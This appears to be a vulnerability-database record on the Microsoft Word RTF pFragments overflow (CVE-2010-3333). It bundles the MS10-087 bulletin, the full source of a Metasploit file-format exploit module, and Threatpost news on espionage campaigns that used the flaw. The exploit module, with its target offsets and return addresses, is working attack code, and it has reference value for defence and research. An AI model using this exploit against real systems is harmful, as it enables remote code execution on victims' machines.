Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions\r\n\u2022\t\r\n\r\nV1.0 (November 9, 2010): Bulletin published.", "edition": 1, "modified": "2010-11-10T00:00:00", "published": "2010-11-10T00:00:00", "id": "SECURITYVULNS:DOC:25106", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25106", "title": "Microsoft Security Bulletin MS10-087 - Critical Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2423930)", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:39", "bulletinFamily": "software", "cvelist": ["CVE-2010-2572", "CVE-2010-3336", "CVE-2010-3337", "CVE-2010-3334", "CVE-2010-3335", "CVE-2010-3333", "CVE-2010-2573"], "description": "Multiple memory corruptions, buffer overflows, integer overflows.", "edition": 1, "modified": "2010-11-15T00:00:00", "published": "2010-11-15T00:00:00", "id": "SECURITYVULNS:VULN:11248", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11248", "title": "Microsoft Office multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:24:43", "description": "", "published": "2010-12-29T00:00:00", "type": "packetstorm", "title": "Microsoft Word RTF pFragments Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3333"], "modified": "2010-12-29T00:00:00", "id": "PACKETSTORM:97153", "href": "https://packetstormsecurity.com/files/97153/Microsoft-Word-RTF-pFragments-Stack-Buffer-Overflow.html", "sourceData": "`## \n# $Id: ms10_087_rtf_pfragments_bof.rb 11450 2010-12-29 20:30:50Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. 
Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::FILEFORMAT \ninclude Msf::Exploit::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)', \n'Description' => %q{ \nThis module exploits a stack-based buffer overflow in the handling of the \n'pFragments' shape property within the Microsoft Word RTF parser. All versions \nof Microsoft Office prior to the release of the MS10-087 bulletin are vulnerable. \n \nThis module does not attempt to exploit the vulnerability via Microsoft Outlook. \n \nThe Microsoft Word RTF parser was only used by default in versions of Microsoft \nWord itself prior to Office 2007. With the release of Office 2007, Microsoft \nbegan using the Word RTF parser, by default, to handle rich-text messages within \nOutlook as well. It was possible to configure Outlook 2003 and earlier to use \nthe Microsoft Word engine too, but it was not a default setting. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'wushi of team509', # original discovery \n'unknown', # exploit found in the wild \n'jduck' # Metasploit module \n], \n'Version' => '$Revision: 11450 $', \n'References' => \n[ \n[ 'CVE', '2010-3333' ], \n[ 'OSVDB', '69085' ], \n[ 'MSB', 'MS10-087' ], \n[ 'BID', '44652' ], \n[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880' ] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 512, \n'BadChars' => \"\\x00\", \n'DisableNops' => true # no need \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# Office v11.8307.8324, winword.exe v11.0.8307.0 \n[ 'Microsoft Office 2003 SP3 English on Windows XP SP3 English', \n{ \n'Offsets' => [ 24536, 51112 ], \n'Ret' => 0x300294e7 # p/p/r in winword.exe \n} \n], \n \n# In order to exploit this bug on Office 2007, a SafeSEH bypass method is needed. \n=begin \n# Office v12.0.6425.1000, winword.exe v12.0.6425.1000 \n[ 'Microsoft Office 2007 SP2 English on Windows XP SP3 English', \n{ \n'Offsets' => [ 5912 ], \n'Ret' => 0x30001ceb # p/p/r in winword.exe \n} \n], \n=end \n \n# crash on a deref path to heaven. 
\n[ 'Crash Target for Debugging', \n{ \n'Offsets' => [ 65535 ], \n'Ret' => 0xdac0ffee \n} \n] \n], \n'DisclosureDate' => 'Nov 09 2010')) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'The file name.', 'msf.rtf']), \n], self.class) \nend \n \ndef exploit \n \noffsets = target['Offsets'] \n \n# Prepare a sample SEH frame \nseh = generate_seh_record(target.ret) \n \n# Prepare a sample backward jump \ndistance = offsets.max \njmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string \n \n# RTF property Array parameters \nel_size = sz_rand() \nel_count = sz_rand() \n \ndata = '' \n# These words are presumably incorrectly used \n# assert(amount1 <= amount2) \ndata << [0x1111].pack('v') * 2 \ndata << [0xc8ac].pack('v') \ndata << [0x1111].pack('v') * 22 \n \n# Filler \nif target.name =~ /Debug/i \nrest = Rex::Text.pattern_create(offsets.max + seh.length + jmp_back.length) \nelse \nrest = rand_text(offsets.max + seh.length + jmp_back.length) \nend \n \n# Add the payload \nrest[0, payload.encoded.length] = payload.encoded \n \n# Fill in the seh frames \noffsets.each { |off| \nrest[off, seh.length] = seh \ndistance = off + seh.length \njmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string \nrest[off + seh.length, jmp_back.length] = jmp_back \n} \n \nsploit = \"%d;%d;\" % [el_size, el_count] \nsploit << data.unpack('H*').first \nsploit << rest.unpack('H*').first \n \ncontent = \"{\\\\rtf1\" \ncontent << \"{\\\\shp\" # shape \ncontent << \"{\\\\sp\" # shape property \ncontent << \"{\\\\sn pFragments}\" # property name \ncontent << \"{\\\\sv #{sploit}}\" # property value \ncontent << \"}\" \ncontent << \"}\" \ncontent << \"}\" \n \nprint_status(\"Creating '#{datastore['FILENAME']}' file ...\") \nfile_create(content) \n \nend \n \ndef sz_rand \nbad_sizes = [ 0, 2, 4, 8 ] \nx = rand(9) \nwhile bad_sizes.include? 
x \nx = rand(9) \nend \nx \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/97153/ms10_087_rtf_pfragments_bof.rb.txt"}], "threatpost": [{"lastseen": "2018-10-06T23:06:23", "bulletinFamily": "info", "cvelist": ["CVE-2010-3333"], "description": "[](<https://threatpost.com/facing-attacks-rtf-hole-microsoft-urges-office-users-patch-010411/>)The Microsoft Malware Protection Center has urged users of its Office suite to apply a security update, [MS10-087](<https://threatpost.com/critical-office-hole-patched-november-release-110910/>), released last November. The company says it has become aware of attacks exploiting the hole in Office applications that are circulating on the Internet.\n\nThe security hole in question affects features that allow Microsoft Office applications to parse different file formats. The vulnerability in question, \u2018RTF Stack Buffer Overflow Vulnerability,\u2019 can be triggered in Microsoft Word with a specially formatted RTF (Rich Text Format) file. Microsoft says it has evidence of specially crafted RTF files circulating in the wild that attempt to trigger the vulnerability, according to a post on the [Microsoft Malware Protection Center blog](<http://blogs.technet.com/b/mmpc/archive/2010/12/29/targeted-attacks-against-recently-addressed-microsoft-office-vulnerability-cve-2010-3333-ms10-087.aspx>).\n\nIn overflow attacks, attackers are able to gain access to areas of a vulnerable machine\u2019s memory beyond what has been allocated for a particular job. That allows malicious code to be copied to unprotected areas of a victim\u2019s system and run, disrupting the operation of the machine or allowing the attacker to install their own code on the system. 
\n\nIn the wild, Microsoft found emails with files titled \u2018Bilawar Bhutto Sex Scandal\u2019 and \u2018New Year\u2019s Greeting Card.\u2019 While the company isn\u2019t speculating on the origin or intended targets of the attacks, both the files themselves and their names were written in Russian.\n\nIn addition to installing the MS10-087 upgrade, the Microsoft Malware Protection team recommends enabling the firewall, using up-to-date anti-virus software, limiting user privileges and using strong passwords on your computer as well as using caution when opening file attachments, accepting file transfers, and linking to unfamiliar websites.\n", "modified": "2013-04-17T20:09:46", "published": "2011-01-04T18:05:55", "id": "THREATPOST:4A77E471AA7DA847C227B575A8681E66", "href": "https://threatpost.com/facing-attacks-rtf-hole-microsoft-urges-office-users-patch-010411/74818/", "type": "threatpost", "title": "Facing Attacks on RTF Hole, Microsoft Urges Office Users To Patch", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:42", "bulletinFamily": "info", "cvelist": ["CVE-2010-3333", "CVE-2012-0158"], "description": "A new cyberespionage malware campaign with ties to China going back to the Titan Rain and Gh0stNet attacks has been targeting diplomats, military contractors and government agencies in 40 countries.\n\nResearchers at Kaspersky Lab today unveiled details on [NetTraveler](<http://www.securelist.com/en/blog/8105/NetTraveler_is_Running_Red_Star_APT_Attacks_Compromise_High_Profile_Victims>), a data exfiltration tool, which has infected more than 350 high profile victims using primarily exploits targeting two patched Microsoft vulnerabilities. 
Costin Raiu, senior security researcher and head of the Global Research and Analysis Team, told attendees today at the 2013 Cybersecurity Forum in Washington, D.C., that one backdoor used in the NetTraveler campaign was probably written by the same developers responsible for Gh0st RAT. In fact, Raiu said, the same group of 50 or so developers could be behind a number of similar espionage attacks dating back close to a decade.\n\n\u201cThere is a very common misconception that all these attacks are separate. In reality all these operations are connected to each other,\u201d Raiu said. \u201cThe NetTraveler attacks are loosely connected with the Gh0stNet attacks, which are loosely connected with Titan Rain.\n\n\u201cThey\u2019re just one big ugly gorilla with a thousand faces and of course we haven\u2019t seen all of them yet,\u201d Raiu said.\n\nIn addition to diplomats and government targets, NetTraveler samples were found to be targeting Tibetan and Uyghur activists, oil production facilities, scientific research outfits, universities and private companies. The tool is capable of extracting system information, dropping keylogging malware and stealing Office documents such as Word, Excel and PowerPoint files, and its configuration can be modified if necessary to steal Corel Draw designs, AutoCAD files and other file types used in manufacturing and defense circles. The files are then compressed and encoded via custom protocols that resemble BASE64 code and sent to a command and control server via HTTP.\n\nThe attacker\u2019s IP operation ranges, the Kaspersky report said, overlap with that of a malware family known as Zegost, or the Gh0st remote access Trojan; one of the Zegost command and control servers was still active as of a few weeks ago. They\u2019re also used to distribute the Saker, a backdoor module used to steal system information that shares export functions via two DLLs named JustTempFun and ServiceMain. 
Those DLL names are also found in Gh0st RAT, the Kaspersky researchers said.\n\nSome of the victims targeted by NetTraveler, meanwhile, are also victims of Red October. However, Kaspersky has not connected the attackers in these two campaigns.\n\n\u201cAlthough we see no direct links between the NetTraveler attackers and the Red October threat actor, the existence of victims infected by both of these campaigns is interesting. These infections indicate that certain high profile victims are targeted by multiple threat actors; the target information is a valuable commodity,\u201d the report said, adding that the victims include a Russian military contractor, a Tajikistan government entity and embassy workers in Iran, Belgium, Kazakhstan and Belarus.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/06/07045233/nettraveler_03s.png>)\n\nThe attacks start with a spear phishing campaign targeting vulnerabilities described in [CVE-2012-0158](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158>) and [CVE-2010-3333](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3333>). The messages and attached decoy documents vary according to the various targets and use a number of exploits that enable remote code execution and exploit of memory vulnerabilities in Office documents. 
Both have been patched, yet these attacks demonstrate the vulnerabilities are still reachable on some systems; no zero-days, rootkits or other advanced malware have been used in the NetTraveler campaign.\n\nKaspersky researchers found more than 22 gigabytes of stolen data on command and control servers they were able to sinkhole and analyze.\n\n\u201cHowever this data represents only a small fraction which we managed to see \u2013 the rest of it had been previously downloaded and deleted from the C&C servers by the attackers,\u201d a report on the campaign said.\n\nKaspersky researchers said the command and control servers were running IIS 6 and 7 and a Microsoft ASP backend. The attackers transferred the stolen data from the command infrastructure using FTP through a VPN connection to a server in the U.S. hosted by Krypt Technologies. \u201cThe infrastructure is secured by allowing FTP access only to remote users coming from predefined IPs, including the VPN provider in the U.S.,\u201d the report said.\n\nIn all, more than 30 command and control servers are used in the NetTraveler campaign and all either collect stolen data or help with obfuscation of the attacks. NetTraveler is so named because of a string found in all early versions of the malware: \u201cNetTraveler Is Running!\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/06/07045237/nettraveler_02.1s.png>)\n\nMost of the victims are diplomats, government agencies or military contractors, the report said. 
Combining data from the command and control servers and Kaspersky Security Network, almost 30 percent of infections happened in Mongolia, followed by Russia, India and Kazakhstan.\n\nKaspersky\u2019s GReAT team released a research report on NetTraveler, which includes indicators of compromise, that can be downloaded [here](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/06/22105852/kaspersky-the-net-traveler-part1-final-1.pdf>).\n", "modified": "2018-03-22T14:58:55", "published": "2013-06-04T12:35:54", "id": "THREATPOST:67D34DEB790B708B10391D13A8BE6EAB", "href": "https://threatpost.com/net-traveler-espionage-campaign-uncovered-links-to-gh0st-rat-titan-rain-found/100865/", "type": "threatpost", "title": "NetTraveler Espionage Malware Campaign Ties to Gh0st RAT", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:42", "bulletinFamily": "info", "cvelist": ["CVE-2010-3333", "CVE-2017-11882"], "description": "[](<https://threatpost.com/critical-office-hole-patched-november-release-110910/>)Microsoft issued its monthly patch on Tuesday, releasing three security bulletins to fix security holes in a range of products, including a critical hole in versions of the Microsoft Office Suite. \n\nThe three bulletins, MS10-087, 088 and -089 fixed a total of 11 vulnerabilities, five in Microsoft Office, two in Microsoft Office PowerPoint and four in Microsoft Unified Access Gateway. The release comes one month after a massive, October patch consisting of 16 bulletins addressing 49 vulnerabilities across a range of products. \n\nFollowing that patch tsunami, November offers a relative respite, as Microsoft indicated in its [pre-release guidance last week](<https://threatpost.com/microsoft-patch-critical-office-flaw-110410/>). Of the three bulletins, only one is rated critical: MS10-087, which fixes holes in versions of the Office Suite ranging from Office XP SP3 to Office 2010. 
Among the holes patched is a [stack buffer overflow vulnerability](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3333>) that\u2019s rated critical for Office 2007, SP2 and for the 32 and 64 bit versions of Office 2010. \n\nStack buffer overflows occur when a program writes to a memory address that\u2019s outside the call stack, or data structure, allocated for that program \u2013 often by sending more data to a fixed length buffer than was intended. Attackers can use this type of programming vulnerability to place malicious code on the vulnerable system and run it with the permissions accorded to the vulnerable application. \n\nIn this case, attackers could use a Rich Text Format (RTF) file to trigger the overflow. Microsoft rated the vulnerability critical due to a recognized attack vector that could use the Outlook e-mail message preview pane to trigger the vulnerability, [according to a post](<https://blogs.technet.com/b/msrc/>) on Microsoft\u2019s Security Resource Center (MSRC) blog. The bulletin also closes an Office-based attack vector for a widespread \u201cDLL Preloading\u201d vulnerability [that garnered attention after security researcher HD Moore posted information](<https://threatpost.com/dll-hijacking-exploit-code-posted-powerpoint-other-apps-082410/>) on applications from a variety of vendors that contained the flaw in August. \n\n[MS10-088](<http://www.microsoft.com/technet/security/bulletin/ms10-088.mspx>) fixes what Microsoft describes as \u201ccooperatively disclosed\u201d holes in the PowerPoint 2002 Service Pack 3 and 2004, Service Pack 3. [MS10-089](<http://www.microsoft.com/technet/security/bulletin/ms10-089.mspx>) fixes application and Unified Access Gateway (UAG), a remote access product that is part of the Microsoft Forefront family of products. 
\n", "modified": "2013-04-17T16:35:43", "published": "2010-11-09T20:55:12", "id": "THREATPOST:5DA1737F4321D42086053820C84CCFB0", "href": "https://threatpost.com/critical-office-hole-patched-november-release-110910/74655/", "type": "threatpost", "title": "Critical Office Hole Patched In November Release", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:15", "bulletinFamily": "info", "cvelist": ["CVE-2010-3333", "CVE-2012-0158"], "description": "A series of targeted attacks are continuing to bully a signed Nvidia application into dropping a backdoor that lets attackers root their way through the systems of Tibetan sympathizers.\n\nAccording to [Sophos\u2019 Gabor Szappanos](<http://nakedsecurity.sophos.com/2013/02/27/targeted-attack-nvidia-digital-signature/>), the multifaceted attack can install a backdoor on unsuspecting users\u2019 machines to siphon off system information, including the computer\u2019s name and OS version along with other bits of sensitive information.\n\nFirst the campaign makes use of an old Microsoft Office vulnerability (CVE-2012-0158) that\u2019s been [used in multiple exploit vectors over the last six months](<https://threatpost.com/tool-scans-rtf-files-spreading-malware-targeted-attacks-091412/>). 
The vulnerability primarily exploits rich text file (RTF) documents to distribute malware and gained popularity last month when it was announced it was one of four exploits [used in the Red October campaign](<https://threatpost.com/anti-tibetan-attack-stems-nvidia-abuse-old-rtf-vulnerability-022713/'s+Most+Popular>).\n\nWhile the vulnerability has been used in the past against Tibetan activists and other Asian military and energy targets, the way the attack leverages an authentic Nvidia tool is interesting.\n\nThe RTF document in this case is an article about the Tibetan Youth Congress that acts as a diversion while three files are dropped onto the system: Nv.exe, NvSmartMax.dll and NvSmartMax.dll.url. Nv.exe is a legitimate executable for Nvidia\u2019s Smart Maximise Helper Host, a tool that helps manage properties for the company\u2019s graphics cards. The DLL file is the malicious part of the equation here though, executing encrypted code in NvSmartMax.dll.url that ultimately compromises the computer and grants the attacker the following remote access functionality:\n\n\n\nThe whole campaign is awfully similar to one [used by the remote access tool PlugX, spotted by TrendMicro last September](<http://blog.trendmicro.com/trendlabs-security-intelligence/unplugging-plugx-capabilities/>). That attack relied on a different, older Microsoft RTF vulnerability (CVE-2010-3333) but also dropped a handful of Nvidia files, including NvSmartMax.dll, onto systems. 
Much like the most recent attack, in the 2012 attack NvSmartMax.dll boots up a backdoor (boot.ldr) that can open and modify files on the infected system.\n\nSophos has a more detailed explanation of the attack, including its multi-step process, at [Naked Security](<http://nakedsecurity.sophos.com/2013/02/27/targeted-attack-nvidia-digital-signature/>).\n", "modified": "2013-04-17T16:30:37", "published": "2013-02-27T19:10:44", "id": "THREATPOST:3C3169D334DC65F9EAF925A5796C7ECF", "href": "https://threatpost.com/anti-tibetan-attack-stems-nvidia-abuse-old-rtf-vulnerability-022713/77570/", "type": "threatpost", "title": "Anti-Tibetan Attack Stems from Nvidia Abuse, Old RTF Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:02", "bulletinFamily": "info", "cvelist": ["CVE-2009-3129", "CVE-2010-3333", "CVE-2012-0158"], "description": "[](<https://threatpost.com/researchers-uncover-targeted-attack-campaign-using-android-malware-032613/>)Android attacks have become all the rage in the last year or two, and targeted attacks against political activists in Tibet, Iran and other countries also have been bubbling up to the surface more and more often lately. Now those two trends have converged with the discovery of a targeted attack campaign that\u2019s going after Tibetan and Uyghur activists with a spear-phishing message containing a malicious APK file. Researchers say the attack appears to be coming from Chinese sources.\n\nThe new campaign began a few days ago when unknown attackers were able to compromise the email account of a well-known Tibetan activist. The attackers then used that account to begin sending a series of spear-phishing messages to other activists in the victim\u2019s contact list. 
One of the messages referred to a human rights conference in Geneva in March, using the recipients\u2019 legitimate interest in the conference as bait to get them to open the attachment. The malicious attachment in the emails is named \u201cWUC\u2019s Conference.apk\u201d.\n\nOnce the victim opens the attachment on her Android phone, the file installs an application called \u201cconference\u201d that will display some information about the Geneva conference. Meanwhile, the malware is running in the background.\n\n\u201cWhile the victim reads this fake message, the malware secretly reports the infection to a command-and-control server. After that, it begins to harvest information stored on the device,\u201d according to an [analysis of the attack by Kaspersky Lab](<https://www.securelist.com/en/blog/208194186/Android_Trojan_Found_in_Targeted_Attack>) researchers.\n\n\u201cIt is important to note that the data won\u2019t be uploaded to C&C server automatically. The Trojan waits for incoming SMS messages (the \u201calarmReceiver.class\u201d) and checks whether these messages contain one of the following commands: \u201csms\u201d, \u201ccontact\u201d, \u201clocation\u201d, \u201cother\u201d. If one these commands is found, then the malware will encode the stolen data with Base64 and upload it to the command and control server.\u201d\n\n\n\nThe malware looks for a specific set of data, including contacts, call logs, SMS messages, geolocation and phone data. The malware communicates with a command-and-control server at the URL: _hxxp://64.78.161.133/*victims\u2019s_cell_phone_number*/process.php. _The malware authors apparently have some familiarity with the Tibetan language, as some of the commands use native words. However, there also are a number of Chinese words and commands in the code, as well.\n\n\u201cThroughout the code, the attackers log all important actions, which include various messages in Chinese. 
This was probably done for debugging purposes, indicating the malware may be an early prototype version,\u201d the Kaspersky analysis says.\n\nInterestingly, the C2 server for the attack is located in Los Angeles and is registered to a company based in Beijing. While this is one of the first known targeted attack campaigns to utilize Android as a delivery mechanism, it likely won\u2019t be the last.\n\n\u201cEvery day, there are hundreds if not thousands of targeted attacks against Tibetan and Uyghur supporters. The vast majority of these target Windows machines through Word documents exploiting known vulnerabilities such as CVE-2012-0158, CVE-2010-3333 and CVE-2009-3129,\u201d the analysis says.\n\n\u201cIn this case, the attackers hacked a Tibetan activist\u2019s account and used it to attack Uyghur activists. It indicates perhaps an interesting trend which is exploiting the trust relationships between the two communities. This technique reminds us of a combination between ages old war strategies \u2018Divide et impera\u2019 and \u2018By way of deception\u2019.\u201d\n", "modified": "2013-04-17T16:30:29", "published": "2013-03-26T14:14:02", "id": "THREATPOST:4474B9334E9322D775C57232CC4127EF", "href": "https://threatpost.com/researchers-uncover-targeted-attack-campaign-using-android-malware-032613/77667/", "type": "threatpost", "title": "Researchers Uncover Targeted Attack Campaign Using Android Malware", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:36", "bulletinFamily": "info", "cvelist": ["CVE-2009-3120", "CVE-2010-3333", "CVE-2012-0158"], "description": "[](<https://threatpost.com/rocra-espionage-malware-campaign-uncovered-after-five-years-activity-011413/>)For five years, it hid in the weeds of networks used by Eastern European diplomats, government employees and scientific research organizations, stealing data and infecting more machines in an espionage campaign rivaling 
Flame and others of its ilk. The campaign, called Rocra or Red October by researchers at Kaspersky Lab, focused not only on workstations, but mobile devices and networking gear to gain a foothold inside strategic organizations. Once inside, attackers pivoted internally and stole everything from files on desktops, smartphones and FTP servers, to email databases using exploits developed in China and Russian malware, Kaspersky researchers said.\n\nWhile Kaspersky would not go so far as to call it a nation-state campaign, the resources behind the attackers and the targets they chose\u2014which also included oil and gas companies, aerospace, nuclear research, and trade and commerce organizations\u2014would indicate an interest in a particular type of information.\n\nMost of the victims were specific organizations in Eastern Europe, former USSR nations and countries in Central Asia. Some attacks were also noticed in Western Europe and North America, Kaspersky said.\n\n\u201cThe campaign is currently still active with data being sent to multiple command-and-control servers through an infrastructure which rivals the complexity of the Flame malware,\u201d Kaspersky said in a [report released today](<http://www.securelist.com/en/blog/785/The_Red_October_Campaign_An_Advanced_Cyber_Espionage_Network_Targeting_Diplomatic_and_Government_Agencies>).\n\nKaspersky said it was alerted of the Rocra attacks by a partner last October when it began its analysis of the campaign. Several hundred infections worldwide have been counted. Three exploits have been used in the attack, all of which Kaspersky said were developed in China; the malware modules dropped in the attacks were created by Russian-speaking operatives, Kaspersky concluded.\n\n\u201cCurrently, there is no evidence linking this with a nation-state sponsored attack. The information stolen by the attackers is obviously of the highest level and includes geopolitical data which can be used by nation states,\u201d the report said. 
\u201cSuch information could be traded in the underground and sold to the highest bidder, which can be of course, anywhere.\u201d\n\nLike most of these APT-style targeted attacks, this one begins with a spear-phishing message; one example provided was an announcement of a diplomatic car for sale. The email messages contain one of three attachments, each a different exploit of an existing vulnerability. One targets [CVE-2009-3120](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3120>) using a malicious Microsoft Excel document, while the other two are Word docs exploiting [CVE-2010-3333](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3333>) or [CVE-2012-0158](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158>). These exploits were used in previous attacks against Tibetan activists and military and energy targets in Asia; for Rocra, the attackers not only reused the exploits, but replaced the payload with their own malware.\n\nThe documents are tailored for specific victims and the malware modules have specific victim ID numbers, Kaspersky said. Rocra operates on a personal level with the victim; the level of interaction is high and driven by the victim\u2019s system configuration, the types of documents on their machine, software installed, native language and more.\n\nOnce the victim opens the malicious document, a Trojan is dropped on the machine which drops a module that scans the local network for other hosts vulnerable to [MS08-067](<http://technet.microsoft.com/en-us/security/bulletin/ms08-067>), the same vulnerability exploited by the Conficker worm, Kaspersky said. It also looks to access other hosts using credentials from its own password database. Another module tries to infect remote hosts on the same network. 
Kaspersky said the malware authors have Russian-speaking origins, and researchers had not seen the malicious executables before; one, for example, would change the default system codepage to 1251, which is required to render Cyrillic fonts, Kaspersky\u2019s report said.\n\nThe campaign targets not only Office documents, email and a long list of document types including the acid* extension, which Kaspersky said refers to the classified Acid Cryptofiler software used by the European Union and NATO.\n\n[](<http://www.securelist.com/en/images/pictures/klblog/208194085.png>)\n\n\u201cThe main purpose of the operation appears to be the gathering of classified information and geopolitical intelligence, although it seems that the information gathering scope is quite wide,\u201d the report said. \u201cDuring the past five years, the attackers collected information from hundreds of high profile victims although it\u2019s unknown how the information was used. It is possible that the information was sold on the black market, or used directly.\u201d\n\nThe command and control infrastructure behind this campaign is made up of 60 domains and a number of server host locations in Russia and Germany, most of which act as proxies in order to hide the true C&C server. Kaspersky said it was able to sinkhole six of the domains and watch them over since Nov. 2. More than 55,000 connections were made to the sinkhole from close to 250 IP addresses. 
Most of those IP addresses were in Switzerland, Kazakhstan, Greece and Belarus; there are victims in 39 countries.\n\nKaspersky said it has not found any connections between Rocra and [Flame](<https://threatpost.com/flame-attackers-used-collision-attack-forge-microsoft-certificate-060512/>), yet did say the campaign was more sophisticated than the [Aurora attacks on Google](<https://threatpost.com/inside-aurora-google-attack-malware-011910/>) or Night Dragon; its researchers found more than 1,000 unique malware files among 30 different categories, including reconnaissance, credential harvesting, email and USB-specific, propagation, mobile devices and data exfiltration.\n\nSome of the modules are one-time tasks, while others must remain persistent. Examples of persistent tasks include: search and extract files from a USB drive; wait for a mobile phone to connect and if it\u2019s an iPhone or Nokia, steal its contents, or if a Windows phone, install a mobile version of Rocra; record keystrokes and screenshots; and more. 
Examples of one-time tasks include: collection of system, network and software information; extract browsing history, saved passwords, Windows account hashes and Outlook account information; write and execute arbitrary code; scan for administrative credentials; scan for Cisco network devices; and more.\n\nMassive amounts of data were lost, the researchers said.\n\n\u201cWith Rocra, the attackers managed to stay in the game for over 5 years and evade detection of most antivirus products while continuing to exfiltrate what must be hundreds of Terabytes by now,\u201d Kaspersky said.\n", "modified": "2013-05-10T14:24:31", "published": "2013-01-14T13:00:00", "id": "THREATPOST:551363592C0C853E266999644B3579E4", "href": "https://threatpost.com/rocra-espionage-malware-campaign-uncovered-after-five-years-activity-011413/77397/", "type": "threatpost", "title": "Rocra Espionage Malware Campaign Uncovered After Five Years of Activity", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:33", "bulletinFamily": "info", "cvelist": ["CVE-2009-3120", "CVE-2009-3129", "CVE-2010-3333", "CVE-2012-0158"], "description": "The [Red October espionage malware campaign](<https://threatpost.com/rocra-espionage-malware-campaign-uncovered-after-five-years-activity-011413/>) is providing security researchers with a deep dive into the complexity of targeted attacks, which in this case made use of more than 1,000 malware modules for everything from reconnaissance on targets to exfiltration of data to command and control servers.\n\nThe moving parts behind Red October are vast and have been under wraps for the better part of five years, [Kaspersky Lab researchers revealed this week](<http://www.securelist.com/en/blog/785/The_Red_October_Campaign_An_Advanced_Cyber_Espionage_Network_Targeting_Diplomatic_and_Government_Agencies>). 
The attackers behind this campaign targeted victims in 39 countries, primarily diplomats, researchers and military facilities among other institutions since August 2007. They stole reams of data and used exploits for known Microsoft vulnerabilities, constantly uploading their loot to a network of 60 command and control servers\u2014a number that rivals the 90-plus domains used by the Flame cyberespionage campaign.\n\nKaspersky was able to sinkhole a half dozen of those domains and watch over a two-month period 250 unique IP addresses connect more than 55,000 times. What they found was a fascinating mix of tasks mandated by the attackers, some of which remained persistent on compromised machines, while others were one-time operations. Most noteworthy is that attacks were tailored for particular victims, each with a unique identifier that enables the attacker to cobble together a complete picture of the victim\u2019s system configuration, browsing habits and more and manage each attack individually if need be.\n\n\u201cThis campaign is extraordinary in terms of the amount of effort that was invested to tailor the attack toolset for victims\u2019 environments,\u201d said senior security researcher Kurt Baumgartner.\n\nMost of the tasks assigned by the attacker via backdoors installed during initial infection are one-time operations delivered by a portable executable (PE) DLL that are executed in memory and discarded, Kaspersky said today in an [expanded report on the campaign](<http://www.securelist.com/en/blog/208194091/Red_October_part_two_the_modules>).\n\nOther tasks require a persistent presence on a machine and are delivered as PE EXE files. 
